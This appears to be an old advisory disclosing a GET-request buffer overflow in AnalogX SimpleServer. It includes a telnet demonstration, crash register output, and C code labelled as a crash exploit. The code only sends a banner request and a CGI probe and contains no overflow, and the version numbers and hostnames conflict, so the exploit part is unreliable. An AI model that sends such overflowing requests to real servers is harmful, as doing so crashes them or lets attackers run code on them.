COMMAND
AnalogX
SYSTEMS AFFECTED
AnalogX WWW HTTP Server v1.1 for Win9x
PROBLEM
Introducing AnalogX SimpleServer: WWW, the first in a series of
simple to use yet powerful servers! This webserver is SO easy to
use, about the only thing you need to know how to do is drag and
drop files; then just click on the 'Start' button, and your
webserver is up and running, serving your pages to the world!
WWW supports MIME file typing, CGI, common log format, and
multi-hosting, just to name a few! If you've always wanted a
compact, easy to use, versatile webserver, then your prayers
have been answered.
UssrLabs found a local/remote buffer overflow. The code that
handles GET commands has an unchecked buffer that allows
arbitrary code to be executed when it is overflowed. Example:
[hell@imahacker]$ telnet die.communitech.net 80
Trying example.com...
Connected to die.communitech.net
Escape character is '^]'.
GET (buffer) HTTP/1.1 <enter><enter>
Where (buffer) is approximately 1000 characters. At this point the server
overflows, and on the remote machine someone will see something
like this.
HTTP caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00afffbc CS=017f EIP=41414141 EFLGS=00010246
EBX=00afffbc SS=0187 ESP=00af0060 EBP=00af0080
ECX=00af0104 DS=0187 ESI=816294f0 FS=0e47
EDX=bff76855 ES=0187 EDI=00af012c GS=0000
Bytes at CS:EIP:
Stack dump:
bff76849 00af012c 00afffbc 00af0148 00af0104 00af0238 bff76855
00afffbc 00af0114 bff87fe9 00af012c 00afffbc 00af0148 00af0104
41414141 00af02f0
Binary or source for this exploit (when finished):
http://www.ussrback.com/
Meanwhile, here is another attempt at an exploit, from the tPG advisory.
/*
Code ripped from a cgi scanner.
I actually stumbled upon the exploit through this code.
C0D3 == M3SSY. Whatever.
-Presto/tPG
*/
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    int sock;
    struct sockaddr_in sin;
    struct hostent *he;
    char foundmsg[] = "200";          /* status code looked for in the reply */
    char *cgistr;
    char buffer[1024];
    int count;
    int numin, foreign = 0;
    char ojsimp[20];
    /* slot 0 is unused; the original scanner only filled slot 1 */
    char *okay[2]   = { NULL, "GET /cgi-bin/tpgnrock HTTP/1.0\n\n" };
    char *player[2] = { NULL, "Check if its running now." };

    if (argc < 2) {
        printf("\n HOSTNAME PLEASE@!# ");
        exit(0);
    }
    if ((he = gethostbyname(argv[1])) == NULL) {
        herror("gethostbyname");
        exit(0);
    }
    printf("\n\n\t Crash Exploit for AnalogX SimpleServer v1.03\n\n");

    /* first connection: fetch the server banner with a HEAD request */
    memset(&sin, 0, sizeof(sin));
    sock = socket(AF_INET, SOCK_STREAM, 0);
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
        perror("connect");
    }
    printf("\n\n HTTPD Version. \n");
    getchar();
    send(sock, "HEAD / HTTP/1.0\n\n", 17, 0);
    numin = recv(sock, buffer, sizeof(buffer) - 1, 0);
    buffer[numin > 0 ? numin : 0] = '\0';   /* recv() does not terminate */
    printf("%s", buffer);
    close(sock);
    printf("\n\t Press something. \n");
    getchar();

    /* one connection per filled slot; the original while(count++ < 2)
       also read okay[2] and player[2], which do not exist */
    for (count = 1; count < 2; count++) {
        sock = socket(AF_INET, SOCK_STREAM, 0);
        bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(80);
        if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
            perror("connect");
        }
        printf(" %s : ", player[count]);
        memset(ojsimp, 0, sizeof(ojsimp));
        send(sock, okay[count], strlen(okay[count]), 0);
        numin = recv(sock, ojsimp, sizeof(ojsimp) - 1, 0);
        ojsimp[numin > 0 ? numin : 0] = '\0';
        cgistr = strstr(ojsimp, foundmsg);
        if (cgistr != NULL) {
            printf("Heh.\n");
            ++foreign;
        } else {
            printf(" tPG\n");
        }
        close(sock);
    }
    if (foreign) {
        printf("bl3h. bl4h. h3h. w00p. 33p.\n");
    }
    return 0;
}
SOLUTION
None yet, but the vendor has been informed.